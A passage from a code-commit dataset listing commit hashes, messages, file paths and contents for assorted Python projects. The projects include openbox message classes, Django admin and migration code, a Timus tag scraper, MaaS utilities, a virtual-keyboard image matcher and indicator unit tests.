                             'identity')
    # TODO(tkammer): add image implementation
if __name__ == "__main__":
    main()
| Python | 0.998657 | |
318b775a150f03e3311cb1a2b93cf21999fac70d | Create base class for openbox messages and create most of the Messages objects | openbox/messages.py | openbox/messages.py | """
Messages between OBC and OBI
"""
import json
class MessageParsingError(Exception):
    """Raised when raw JSON cannot be parsed into a known Message type."""
class MessageMeta(type):
    """Metaclass that auto-registers every message subclass by class name."""
    def __init__(cls, name, bases, dct):
        super(MessageMeta, cls).__init__(name, bases, dct)
        if hasattr(cls, "messages_registry"):
            # Derived class: record it in the shared registry under its name.
            cls.messages_registry[name] = cls
        else:
            # Base class: start with an empty registry.
            cls.messages_registry = {}
class Message(object):
    """
    The base class for all messages.

    Messages shouldn't derive from this class directly but from one of its
    subclasses (MessageRequest / MessageResponse).
    """
    __metaclass__ = MessageMeta
    # a list of the fields in the message, no need to put the 'type' field
    __slots__ = ['xid']
    # Global XID counter used to auto-number messages without an explicit xid
    XID = 0
    def __init__(self, **kwargs):
        # Auto-assign a transaction id when the caller did not supply one.
        if 'xid' not in kwargs:
            kwargs['xid'] = Message.XID
            Message.XID += 1
        # Every field declared in __slots__ is mandatory.
        for field in self.__slots__:
            try:
                setattr(self, field, kwargs[field])
            except KeyError:
                raise TypeError("Field %s, not given" % field)
    @classmethod
    def from_json(cls, raw_data):
        """Parse raw JSON into an instance of the registered message class."""
        obj = json.loads(raw_data)
        try:
            msg_type = obj.pop('type')
            clazz = cls.messages_registry[msg_type]
        except KeyError:
            # BUGFIX: the original format string had no placeholder, so the
            # "%" raised a TypeError instead of reporting the bad message.
            raise MessageParsingError("Unknown Message Type: %s" % raw_data)
        try:
            return clazz(**obj)
        except TypeError as e:
            # str(e) works on both Python 2 and 3; e.message is Python 2 only.
            raise MessageParsingError(str(e))
    def to_dict(self):
        """Return the message fields as a plain dict (without the 'type' key)."""
        return dict((field, getattr(self, field)) for field in self.__slots__)
    def to_json(self):
        """Serialize the message, adding the class name as the 'type' field."""
        obj_dict = self.to_dict()
        obj_dict['type'] = self.__class__.__name__
        return json.dumps(obj_dict)
    def __str__(self):
        return self.to_json()
class MessageRequest(Message):
    """
    A request message.
    """
    # No extra behaviour: requests differ from responses only semantically.
    pass
class MessageResponse(Message):
    """
    A response message
    """
    # The fields to copy from the request
    __copy_request_fields__ = ['xid']
    @classmethod
    def from_request(cls, request, **kwargs):
        """Build a response, copying the declared fields from the request."""
        copied = dict((name, getattr(request, name))
                      for name in cls.__copy_request_fields__)
        kwargs.update(copied)
        return cls(**kwargs)
# --- Concrete wire messages -------------------------------------------------
# Each subclass redeclares its full field list in __slots__ (including the
# inherited 'xid'); Message.__init__ treats every listed field as mandatory,
# and the metaclass registers each class so Message.from_json can find it by
# its class name.
class Hello(MessageRequest):
    __slots__ = ['xid', 'dpid', 'version', 'capabilities']
class KeepAlive(MessageRequest):
    __slots__ = ['xid', 'dpid']
class ListCapabilitiesRequest(MessageRequest):
    __slots__ = ['xid', ]
class ListCapabilitiesResponse(MessageResponse):
    __slots__ = ['xid', 'capabilities']
class GlobalStatsRequest(MessageRequest):
    __slots__ = ['xid']
class GlobalStatsResponse(MessageResponse):
    __slots__ = ['xid', 'stats']
class GlobalStatsReset(MessageRequest):
    __slots__ = ['xid']
class ReadRequest(MessageRequest):
    __slots__ = ['xid', 'block_id', 'read_handle']
class ReadResponse(MessageResponse):
    __slots__ = ['xid', 'block_id', 'read_handle', 'result']
    __copy_request_fields__ = ['xid', 'block_id', 'read_handle']
class WriteRequest(MessageRequest):
    __slots__ = ['xid', 'block_id', 'write_handle', 'value']
class WriteResponse(MessageResponse):
    __slots__ = ['xid', 'block_id', 'write_handle']
    __copy_request_fields__ = ['xid', 'block_id', 'write_handle']
class SetProcessingGraph(MessageRequest):
    __slots__ = ['xid', 'required_modules', 'block', 'connectors']
class SetLogServer(MessageRequest):
    __slots__ = ['xid', 'address', 'port']
class BarrierRequest(MessageRequest):
    __slots__ = ['xid']
class Error(MessageResponse):
    __slots__ = ['xid', 'error_type', 'error_subtype', 'message', 'extended_message']
class SetStorageServer(MessageRequest):
    __slots__ = ['xid', 'address', 'port']
class AddCustomModule(MessageRequest):
    __slots__ = ['xid', 'module_name', 'module_content', 'content_type', 'content_transfer_encoding', 'translation']
class RemoveCustomModule(MessageRequest):
    __slots__ = ['xid', 'module_name']
d08426ffde22c2ded72425f1d1c54923b9aa0b97 | Update TFRT dependency to use revision http://github.com/tensorflow/runtime/commit/4b193958ac9b893b33dc03cc6882c70ad4ad509d. | third_party/tf_runtime/workspace.bzl | third_party/tf_runtime/workspace.bzl | """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive", "tf_mirror_urls")
def repo():
    """Imports TFRT."""
    # Attention: tools parse and update these lines.
    # Pinned TFRT revision and the SHA256 of its release tarball.
    TFRT_COMMIT = "4b193958ac9b893b33dc03cc6882c70ad4ad509d"
    TFRT_SHA256 = "5b011d3f3b25e6c9646da078d0dbd8000ca063fa4fe6ef53449692c363fa13f7"
    tf_http_archive(
        name = "tf_runtime",
        sha256 = TFRT_SHA256,
        strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
        urls = tf_mirror_urls("https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT)),
        # A patch file can be provided for atomic commits to both TF and TFRT.
        # The job that bumps the TFRT_COMMIT also resets patch_file to 'None'.
        patch_file = None,
    )
| """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive", "tf_mirror_urls")
def repo():
    """Imports TFRT."""
    # Attention: tools parse and update these lines.
    # Pinned TFRT revision and the SHA256 of its release tarball.
    TFRT_COMMIT = "f5ea7e9c419b881d7f3136de7a7388a23feee70e"
    TFRT_SHA256 = "723c9b1fabc504fed5b391fc766e2504559c2b02b4f4e01c55bc77b8ff0df8ed"
    tf_http_archive(
        name = "tf_runtime",
        sha256 = TFRT_SHA256,
        strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
        urls = tf_mirror_urls("https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT)),
        # A patch file can be provided for atomic commits to both TF and TFRT.
        # The job that bumps the TFRT_COMMIT also resets patch_file to 'None'.
        patch_file = None,
    )
| Python | 0 |
79a38e9ef0ac04c4efef55c26f74ad2b11442a7b | add a command to fix the missing packages | crate_project/apps/crate/management/commands/fix_missing_files.py | crate_project/apps/crate/management/commands/fix_missing_files.py | from django.core.management.base import BaseCommand
from packages.models import ReleaseFile
from pypi.processor import PyPIPackage
class Command(BaseCommand):
    """Re-process every package that has a release file missing its digest."""
    def handle(self, *args, **options):
        i = 0
        # One representative ReleaseFile per package with an empty digest.
        for rf in ReleaseFile.objects.filter(digest="").distinct("release__package"):
            p = PyPIPackage(rf.release.package)
            p.process()
            i += 1
            # Parenthesised single-argument print works on Python 2 and 3.
            print("%s %s" % (rf.release.package.name, rf.release.version))
        print("Fixed %d packages" % i)
| Python | 0.000009 | |
50b9aff7914885b590748ebd8bca4350d138670c | Add admin section for the ``Resources``. | us_ignite/resources/admin.py | us_ignite/resources/admin.py | from django.contrib import admin
from us_ignite.resources.models import Resource
class ResourceAdmin(admin.ModelAdmin):
list_display = ('name', 'slug', 'status', 'is_featured')
search_fields = ('name', 'slug', 'description', 'url')
list_filter = ('is_featured', 'created')
date_hierarchy = 'created'
raw_id_fields = ['owner', ]
admin.site.register(Resource, ResourceAdmin)
| Python | 0 | |
20c9f1416243c020b270041621098ca20e09eca4 | tag retrieval script added | private/scripts/extras/timus_tag_retrieval.py | private/scripts/extras/timus_tag_retrieval.py | """
Copyright (c) 2015-2018 Raj Patel(raj454raj@gmail.com), StopStalk
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import bs4, requests
from time import sleep
tags = set([])
for i in xrange(1900, 2111):
url = "http://acm.timus.ru/problem.aspx?space=1&num=%d&locale=en" % i
response = requests.get(url)
soup = bs4.BeautifulSoup(response.text, "lxml")
all_as = soup.find("div",
class_="problem_links").previous_sibling.find_all("a")[:-1]
print i, [x.text for x in all_as]
for tmp in all_as:
tags.add(tmp.text)
sleep(1)
print tags | Python | 0 | |
9932b1989038bd3376b1c5d3f5d9c65a21670831 | add energy calibration to xpd | profile_collection/startup/42-energy-calib.py | profile_collection/startup/42-energy-calib.py | from __future__ import division, print_function
import numpy as np
from lmfit.models import VoigtModel
from scipy.signal import argrelmax
import matplotlib.pyplot as plt
def lamda_from_bragg(th, d, n):
return 2 * d * np.sin(th / 2.) / n
def find_peaks(chi, sides=6, intensity_threshold=0):
# Find all potential peaks
preliminary_peaks = argrelmax(chi, order=20)[0]
# peaks must have at least sides pixels of data to work with
preliminary_peaks2 = preliminary_peaks[
np.where(preliminary_peaks < len(chi) - sides)]
# make certain that a peak has a drop off which causes the peak height to
# be more than twice the height at sides pixels away
criteria = chi[preliminary_peaks2] >= 2 * chi[preliminary_peaks2 + sides]
criteria *= chi[preliminary_peaks2] >= 2 * chi[preliminary_peaks2 - sides]
criteria *= chi[preliminary_peaks2] >= intensity_threshold
peaks = preliminary_peaks[np.where(criteria)]
left_idxs = peaks - sides
right_idxs = peaks + sides
peak_centers = peaks
left_idxs[left_idxs < 0] = 0
right_idxs[right_idxs > len(chi)] = len(chi)
return left_idxs, right_idxs, peak_centers
def get_energy_from_std_tth(x, y, d_spacings, ns, plot=False):
# step 1 get the zero
auto_corr = np.correlate(y, y, mode='same')
plt.plot(x, auto_corr)
plt.show()
zero_point = np.argmax(auto_corr)
print(len(x)/2, zero_point)
print(x[len(x)/2], x[zero_point])
new_x = x - x[zero_point]
if plot:
plt.plot(x, y, 'b')
plt.plot(x[zero_point], y[zero_point], 'ro')
plt.plot(new_x, y, 'g')
plt.show()
# step 2 get all the maxima worth looking at
l, r, c = find_peaks(y)
print(l, r, c)
lmfig_centers = []
for lidx, ridx, peak_center in zip(l, r, c):
mod = VoigtModel()
pars = mod.guess(y[lidx: ridx],
x=x[lidx: ridx])
out = mod.fit(y[lidx: ridx], pars,
x=x[lidx: ridx])
lmfig_centers.append(out.values['center'])
if plot:
plt.plot(new_x, y)
plt.plot(new_x[c], y[c], 'ro')
plt.show()
wavelengths = []
for center, d, n in zip(lmfig_centers, d_spacings, ns):
wavelengths.append(lamda_from_bragg(center, d, n))
return np.average(wavelengths)
if __name__ == '__main__':
import os
directory = '/home/cwright/Downloads'
filename='Lab6_67p8.chi'
calibration_file = os.path.join(directory, filename)
# step 0 load data
d_spacings = np.loadtxt(calibration_file)
# ns = np.ones(len(d_spacings))
# x = np.linspace(-np.pi, np.pi, 100)
# y = np.sin(x)
# x = np.linspace(-np.pi+1, np.pi, 100)
a = np.loadtxt('/home/cwright/Downloads/Lab6_67p8.chi')
x = a[:, 0]
x = np.hstack((np.zeros(1), x))
print(x.shape)
x = np.hstack((-x[::-1], x))
y = a[:, 1]
y = np.hstack((np.zeros(1), y))
y = np.hstack((y[::-1], y))
x = x[3:]
y = y[3:]
plt.plot(np.linspace(0, 10, x.shape[0]), y)
plt.show()
get_energy_from_std_tth(x, y, [], [], plot=True)
| Python | 0 | |
0136d50265fc390d194436238b88655327982231 | add gobOauth.py | gobOauth.py | gobOauth.py | import praw
import configparser
SAVEFILE = "oauth.ini"
def read_ini():
cfg = configparser.ConfigParser()
cfg.read(SAVEFILE)
return cfg
def get_refreshable_instance():
cfg = read_ini()
reddit = praw.Reddit(client_id=cfg['app']['client_id'],
client_secret=cfg['app']['client_secret'],
refresh_token=cfg['token']['refresh_token'],
user_agent=cfg['app']['user_agent'])
return reddit | Python | 0.000003 | |
e0b84a97e4c7ad5dcef336080657a884cff603fc | Test two windows drawing GL with different contexts. | tests/gl_test_2.py | tests/gl_test_2.py | #!/usr/bin/env python
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import pyglet.window
from pyglet.window.event import *
import time
from pyglet.GL.VERSION_1_1 import *
from pyglet.GLU.VERSION_1_1 import *
from pyglet import clock
factory = pyglet.window.WindowFactory()
factory.config._attributes['doublebuffer'] = 1
class ExitHandler(object):
running = True
def on_close(self):
self.running = False
def on_keypress(self, symbol, modifiers):
if symbol == pyglet.window.key.K_ESCAPE:
self.running = False
return EVENT_UNHANDLED
exit_handler = ExitHandler()
def setup():
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(60., 1., 1., 100.)
glMatrixMode(GL_MODELVIEW)
glClearColor(1, 1, 1, 1)
glColor4f(.5, .5, .5, .5)
def draw():
global r
glClear(GL_COLOR_BUFFER_BIT)
glLoadIdentity()
r += 1
if r > 360: r = 0
glRotatef(r, 0, 0, 1)
glBegin(GL_QUADS)
glVertex3f(-1., -1., -5.)
glVertex3f(-1., 1., -5.)
glVertex3f(1., 1., -5.)
glVertex3f(1., -1., -5.)
glEnd()
w1 = factory.create(width=200, height=200)
w1.push_handlers(exit_handler)
w1.switch_to()
setup()
c = clock.Clock()
w2 = factory.create(width=400, height=400)
w2.push_handlers(exit_handler)
w2.switch_to()
setup()
r = 0
while exit_handler.running:
c.set_fps(60)
w1.switch_to()
w1.dispatch_events()
draw()
w1.flip()
w2.switch_to()
w2.dispatch_events()
draw()
w2.flip()
| Python | 0.000005 | |
bdaa80badf1f3d8c972c5da7d0fe65a0c3f63752 | Update maasutils.py to fix pep8 | tests/maasutils.py | tests/maasutils.py | #!/usr/bin/env python
import os
import sys
import click
from rackspace_monitoring.providers import get_driver
from rackspace_monitoring.types import Provider
import requests
@click.group()
@click.option("--username", required=True)
@click.option("--api-key", required=True)
@click.pass_context
def cli(ctx, api_key, username):
ctx.obj = {
'username': username,
'api-key': api_key
}
url = 'https://identity.api.rackspacecloud.com/v2.0/tokens'
headers = {"Content-type": "application/json"}
data = {
"auth": {
"RAX-KSKEY:apiKeyCredentials": {
"username": username,
"apiKey": api_key
}
}
}
try:
r = requests.post(url, headers=headers, json=data)
r.raise_for_status()
except requests.exceptions.RequestException as e:
print(e)
sys.exit(1)
except requests.exceptions.HTTPError as httpe:
print(httpe)
sys.exit(1)
resp = r.json()
ctx.obj['token'] = resp['access']['token']['id']
monitoring_service = next(
s for s in resp['access']['serviceCatalog']
if s["name"] == "cloudMonitoring"
)
ctx.obj['url'] = monitoring_service['endpoints'][0]['publicURL']
@click.command(name='get_token_url')
@click.pass_context
def get_token_url(ctx):
cred_file = os.path.expanduser('~/maas-vars.rc')
with open(cred_file, 'w') as f:
f.write(
"export MAAS_AUTH_TOKEN={token}\n"
"export MAAS_API_URL={url}\n".format(
token=ctx.obj['token'],
url=ctx.obj['url']
)
)
click.echo(
'Credentials file written to "{cred_file}"'.format(
cred_file=cred_file
)
)
return ctx.obj['token'], ctx.obj['url']
@click.command(name='set_webhook_token')
@click.option("--token", 'webhook_token', required=True)
@click.pass_context
def set_webhook_token(ctx, webhook_token):
"""Sets the token that is included in MaaS webhook notifications
This is one method of verifying that receieved requests are
from MaaS. This is per account.
"""
auth_token, url = ctx.invoke(get_token_url)
try:
response = requests.put(
"{url}/account".format(url=url),
headers={'X-Auth-Token': auth_token},
json={'webhook_token': webhook_token})
response.raise_for_status()
click.echo("Webhook token set to {}".format(webhook_token))
except requests.exceptions.HTTPError as e:
click.echo(response.text)
raise e
@click.command(name='get_entity_id')
@click.option("--label", help="label of entity to get ID for", required=True)
@click.pass_context
def get_entity_id(ctx, label):
Cls = get_driver(Provider.RACKSPACE)
driver = Cls(ctx.obj['username'], ctx.obj['api-key'])
entities = driver.list_entities()
for e in entities:
if label == e.label:
click.echo(e.id)
cli.add_command(get_token_url)
cli.add_command(set_webhook_token)
cli.add_command(get_entity_id)
if __name__ == "__main__":
cli()
| #!/usr/bin/env python
import os
import sys
import click
from rackspace_monitoring.providers import get_driver
from rackspace_monitoring.types import Provider
import requests
@click.group()
@click.option("--username", required=True)
@click.option("--api-key", required=True)
@click.pass_context
def cli(ctx, api_key, username):
ctx.obj = {
'username': username,
'api-key': api_key
}
url = 'https://identity.api.rackspacecloud.com/v2.0/tokens'
headers = {"Content-type": "application/json"}
data = {
"auth": {
"RAX-KSKEY:apiKeyCredentials": {
"username": username,
"apiKey": api_key
}
}
}
try:
r = requests.post(url, headers=headers, json=data)
r.raise_for_status()
except requests.exceptions.RequestException as e:
print(e)
sys.exit(1)
except requests.exceptions.HTTPError as httpe:
print(httpe)
sys.exit(1)
resp = r.json()
ctx.obj['token'] = resp['access']['token']['id']
monitoring_service = next(
s for s in resp['access']['serviceCatalog']
if s["name"] == "cloudMonitoring"
)
ctx.obj['url'] = monitoring_service['endpoints'][0]['publicURL']
@click.command(name='get_token_url')
@click.pass_context
def get_token_url(ctx):
cred_file = os.path.expanduser('~/maas-vars.rc')
with open(cred_file, 'w') as f:
f.write(
"export MAAS_AUTH_TOKEN={token}\n"
"export MAAS_API_URL={url}\n".format(
token=ctx.obj['token'],
url=ctx.obj['url']
)
)
click.echo(
'Credentials file written to "{cred_file}"'.format(
cred_file=cred_file
)
)
return ctx.obj['token'], ctx.obj['url']
@click.command(name='set_webhook_token')
@click.option("--token", 'webhook_token', required=True)
@click.pass_context
def set_webhook_token(ctx, webhook_token):
"""Sets the token that is included in MaaS webhook notifications
This is one method of verifying that receieved requests are
from MaaS. This is per account.
"""
auth_token, url = ctx.invoke(get_token_url)
try:
response = requests.put(
"{url}/account".format(url=url),
headers={'X-Auth-Token': auth_token},
json={'webhook_token': webhook_token})
response.raise_for_status()
click.echo("Webhook token set to {}".format(webhook_token))
except requests.exceptions.HTTPError as e:
click.echo(response.text)
raise e
@click.command(name='get_entity_id')
@click.option("--label", help="label of entity to get ID for", required=True)
@click.pass_context
def get_entity_id(ctx, label):
Cls = get_driver(Provider.RACKSPACE)
driver = Cls(ctx.obj['username'], ctx.obj['api-key'])
entities = driver.list_entities()
for e in entities:
if label == e.label:
click.echo(e.id)
cli.add_command(get_token_url)
cli.add_command(set_webhook_token)
cli.add_command(get_entity_id)
if __name__ == "__main__":
cli() | Python | 0 |
8affb8e4a3744e604b88157a918ef690203cbfa8 | Remove disallowed characters from stream names. | zerver/migrations/0375_invalid_characters_in_stream_names.py | zerver/migrations/0375_invalid_characters_in_stream_names.py | import unicodedata
from django.db import connection, migrations
from django.db.backends.postgresql.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
# There are 66 Unicode non-characters; see
# https://www.unicode.org/faq/private_use.html#nonchar4
unicode_non_chars = set(
chr(x)
for x in list(range(0xFDD0, 0xFDF0)) # FDD0 through FDEF, inclusive
+ list(range(0xFFFE, 0x110000, 0x10000)) # 0xFFFE, 0x1FFFE, ... 0x10FFFE inclusive
+ list(range(0xFFFF, 0x110000, 0x10000)) # 0xFFFF, 0x1FFFF, ... 0x10FFFF inclusive
)
def character_is_printable(character: str) -> bool:
return not (unicodedata.category(character) in ["Cc", "Cs"] or character in unicode_non_chars)
def fix_stream_names(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
Stream = apps.get_model("zerver", "Stream")
Realm = apps.get_model("zerver", "Realm")
total_fixed_count = 0
realm_ids = Realm.objects.values_list("id", flat=True)
if len(realm_ids) == 0:
return
print("")
for realm_id in realm_ids:
print(f"Processing realm {realm_id}")
realm_stream_dicts = Stream.objects.filter(realm_id=realm_id).values("id", "name")
occupied_stream_names = set(stream_dict["name"] for stream_dict in realm_stream_dicts)
for stream_dict in realm_stream_dicts:
stream_name = stream_dict["name"]
fixed_stream_name = "".join(
[
character if character_is_printable(character) else "\N{REPLACEMENT CHARACTER}"
for character in stream_name
]
)
if fixed_stream_name == stream_name:
continue
if fixed_stream_name == "":
fixed_stream_name = "(no name)"
# The process of stripping invalid characters can lead to collisions,
# with the new stream name being the same as the name of another existing stream.
# We append underscore until the name no longer conflicts.
while fixed_stream_name in occupied_stream_names:
fixed_stream_name += "_"
occupied_stream_names.add(fixed_stream_name)
total_fixed_count += 1
with connection.cursor() as cursor:
cursor.execute(
"UPDATE zerver_stream SET name = %s WHERE id = %s",
[fixed_stream_name, stream_dict["id"]],
)
print(f"Fixed {total_fixed_count} stream names")
class Migration(migrations.Migration):
atomic = False
dependencies = [
("zerver", "0374_backfill_user_delete_realmauditlog"),
]
operations = [
migrations.RunPython(fix_stream_names, reverse_code=migrations.RunPython.noop),
]
| Python | 0 | |
1deb35d9aa62a6c950cb978063c7f4aed645067b | Add utility module for logging | mediacloud/mediawords/util/log.py | mediacloud/mediawords/util/log.py | import logging
def create_logger(name):
"""Create and return 'logging' instance."""
formatter = logging.Formatter(fmt='%(asctime)s - %(levelname)s - %(module)s - %(message)s')
handler = logging.StreamHandler()
handler.setFormatter(formatter)
l = logging.getLogger(name)
l.setLevel(logging.DEBUG)
l.addHandler(handler)
return l
| Python | 0 | |
12c483953f39a3bacaab6d49ba17c4920db52179 | Add script to clean up all FD phone and fax numbers. | firecares/firestation/management/commands/cleanup_phonenumbers.py | firecares/firestation/management/commands/cleanup_phonenumbers.py | from django.core.management.base import BaseCommand
from firecares.firestation.models import FireDepartment
from phonenumber_field.modelfields import PhoneNumber
import re
"""
This command is for cleaning up every phone and fax number in the
database. It removes all non-numeric characters, such as parenthesis,
hyphens, spaces, etc. It also removes prefixed 1s These numbers should
be made human-readable on the client side.
"""
def cleanNumber(no1):
no2 = re.sub('[^0-9]','', no1)
if no2.startswith("1"):
no2 = no2[1:]
return no2
class Command(BaseCommand):
def handle(self, *args, **kwargs):
print("Don't worry, it always takes this long.")
for fd in FireDepartment.objects.all():
# If the FD has a phone number, clean it up
if fd.headquarters_phone and not fd.headquarters_phone.raw_input == "Invalid Input":
newPhone = cleanNumber(fd.headquarters_phone.raw_input)
print(newPhone)
fd.headquarters_phone = newPhone
# If the FD has a fax number, clean it up
if fd.headquarters_fax and not fd.headquarters_fax.raw_input == "Invalid Input":
newFax = cleanNumber(fd.headquarters_fax.raw_input)
print(newFax)
fd.headquarters_fax = newFax
# Save and continue to the next FD (if any)
fd.save()
print("Completed successfully!")
| Python | 0 | |
07d723368550b94202804aa2cc29c6242fbde26e | Add virtual keyboard tool | weboob/tools/virtkeyboard.py | weboob/tools/virtkeyboard.py | # -*- coding: utf-8 -*-
# Copyright(C) 2011 Pierre Mazière
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import hashlib
import Image
class VirtKeyboardError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
class VirtKeyboard(object):
def __init__(self, file,coords,color=None):
# file: virtual keyboard image
# coords: dictionary <value to return>:<tuple(x1,y1,x2,y2)>
# color: color of the symbols in the image
# depending on the image, it can be a single value or a tuple
self.color=color
img=Image.open(file)
self.bands=img.getbands()
(self.width,self.height)=img.size
self.pixar=img.load()
self.coords={}
self.md5={}
for i in coords.keys():
if self.color is None:
self.coords[i]=coords[i]
else:
coord=self.get_symbol_coords(coords[i])
if coord==(-1,-1,-1,-1):
continue
self.coords[i]=coord
self.md5[i]=self.checksum(self.coords[i])
def get_symbol_coords(self,(x1,y1,x2,y2)):
newY1=-1
newY2=-1
for y in range(y1,min(y2+1,self.height)):
empty_line=True
for x in range(x1,min(x2+1,self.width)):
if self.pixar[x,y] == self.color:
empty_line=False
if newY1==-1:
newY1=y
break;
else:
break
if newY1!=-1 and empty_line:
newY2=y-1
break
newX1=-1
newX2=-1
for x in range(x1,min(x2+1,self.width)):
empty_column=True
for y in range(y1,min(y2+1,self.height)):
if self.pixar[x,y] == self.color:
empty_column=False
if newX1==-1:
newX1=x
break
else:
break
if newX1!=-1 and empty_column:
newX2=x-1
break
return (newX1,newY1,newX2,newY2)
def checksum(self,(x1,y1,x2,y2)):
s = ''
for y in range(y1,min(y2+1,self.height)):
for x in range(x1,min(x2+1,self.width)):
if self.pixar[x,y]==self.color:
s += "."
else:
s += " "
return hashlib.md5(s).hexdigest()
def get_symbol_code(self,md5sum):
for i in self.md5.keys():
if md5sum == self.md5[i]:
return i
raise VirtKeyboardError('Symbol not found')
def generate_MD5(self,dir):
for i in self.coords.keys():
width=self.coords[i][2]-self.coords[i][0]+1
height=self.coords[i][3]-self.coords[i][1]+1
img=Image.new(''.join(self.bands),(width,height))
matrix=img.load()
for y in range(height):
for x in range(width):
matrix[x,y]=self.pixar[self.coords[i][0]+x,self.coords[i][1]+y]
img.save(dir+"/"+self.md5[i]+".png")
| Python | 0 | |
c99b4c9c4b42d7f6c1e3800ed5595e86db95b6cf | finish hello world program for dajax | gui/ajax.py | gui/ajax.py | # -*- coding: UTF-8 -*-
'''
Created on 2013-03-25
@author: tianwei
Desc: This module will be used for ajax request, such as form valid, search
query, calculated submit.
'''
import simplejson
from dajaxice.decorators import dajaxice_register
@dajaxice_register(method='GET')
@dajaxice_register(method='POST', name="calculate_submit_post")
def calculate_submit(request, data):
return simplejson.dumps({'message': 'tianwei hello world!'+data})
| Python | 0.997924 | |
88cacd862477ded4344ac1ab3de1580d09f6db9c | add org level and lables | indicators/test.py | indicators/test.py | from django.test import TestCase
from django.test import RequestFactory
from django.test import Client
from indicators.models import Indicator, IndicatorType, DisaggregationType, ReportingFrequency, CollectedData
from workflow.models import Program, Country, Organization
from django.contrib.auth.models import User
class IndicatorTestCase(TestCase):
fixtures = ['fixtures/organization.json','fixtures/country.json']
def setUp(self):
new_organization = Organization.objects.create(name="tola")
new_organization.save()
get_organization = Organization.objects.get(name="tola")
new_country = Country.objects.create(country="testcountry", organization=get_organization)
new_country.save()
get_country = Country.objects.get(country="testcountry")
new_program = Program.objects.create(name="testprogram")
new_program.save()
new_program.country.add(get_country)
get_program = Program.objects.get(name="testprogram")
new_indicator_type = IndicatorType.objects.create(indicator_type="testtype")
new_indicator_type.save()
get_indicator_type = IndicatorType.objects.get(indicator_type="testtype")
new_disaggregation = DisaggregationType.objects.create(disaggregation_type="disagg")
new_disaggregation.save()
get_disaggregation = DisaggregationType.objects.get(disaggregation_type="disagg")
new_frequency = ReportingFrequency.objects.create(frequency="newfreq")
new_frequency.save()
get_frequency = ReportingFrequency.objects.get(frequency="newfreq")
user = User.objects.create_user('john', 'lennon@thebeatles.com', 'johnpassword')
user.save()
get_user = User.objects.get(username='john')
new_indicator = Indicator.objects.create(name="testindicator",number="1.2.3",source="testing",
baseline="10",lop_target="10", reporting_frequency=get_frequency)
new_indicator.save()
new_indicator.disaggregation.add(get_disaggregation)
new_indicator.indicator_type.add(get_indicator_type)
new_indicator.program.add(get_program)
get_indicator = Indicator.objects.get(name="testindicator")
new_collected = CollectedData.objects.create(targeted="12",achieved="20", description="somevaluecollected", indicator=get_indicator)
new_collected.save()
def test_indicator_exists(self):
"""Check for Indicator object"""
get_indicator = Indicator.objects.get(name="testindicator")
self.assertEqual(Indicator.objects.filter(id=get_indicator.id).count(), 1)
def test_collected_exists(self):
"""Check for CollectedData object"""
get_collected = CollectedData.objects.get(description="somevaluecollected")
self.assertEqual(CollectedData.objects.filter(id=get_collected.id).count(), 1)
| from django.test import TestCase
from django.test import RequestFactory
from django.test import Client
from indicators.models import Indicator, IndicatorType, DisaggregationType, ReportingFrequency, CollectedData
from workflow.models import Program, Country, Organization
from django.contrib.auth.models import User
class IndicatorTestCase(TestCase):
fixtures = ['fixtures/organziation.json','fixtures/country.json']
def setUp(self):
new_organization = Organization.objects.create(name="tola")
new_organization.save()
get_organization = Organization.objects.get(name="tola")
new_country = Country.objects.create(country="testcountry", organization=get_organization)
new_country.save()
get_country = Country.objects.get(country="testcountry")
new_program = Program.objects.create(name="testprogram")
new_program.save()
new_program.country.add(get_country)
get_program = Program.objects.get(name="testprogram")
new_indicator_type = IndicatorType.objects.create(indicator_type="testtype")
new_indicator_type.save()
get_indicator_type = IndicatorType.objects.get(indicator_type="testtype")
new_disaggregation = DisaggregationType.objects.create(disaggregation_type="disagg")
new_disaggregation.save()
get_disaggregation = DisaggregationType.objects.get(disaggregation_type="disagg")
new_frequency = ReportingFrequency.objects.create(frequency="newfreq")
new_frequency.save()
get_frequency = ReportingFrequency.objects.get(frequency="newfreq")
user = User.objects.create_user('john', 'lennon@thebeatles.com', 'johnpassword')
user.save()
get_user = User.objects.get(username='john')
new_indicator = Indicator.objects.create(name="testindicator",number="1.2.3",source="testing",
baseline="10",lop_target="10", reporting_frequency=get_frequency)
new_indicator.save()
new_indicator.disaggregation.add(get_disaggregation)
new_indicator.indicator_type.add(get_indicator_type)
new_indicator.program.add(get_program)
get_indicator = Indicator.objects.get(name="testindicator")
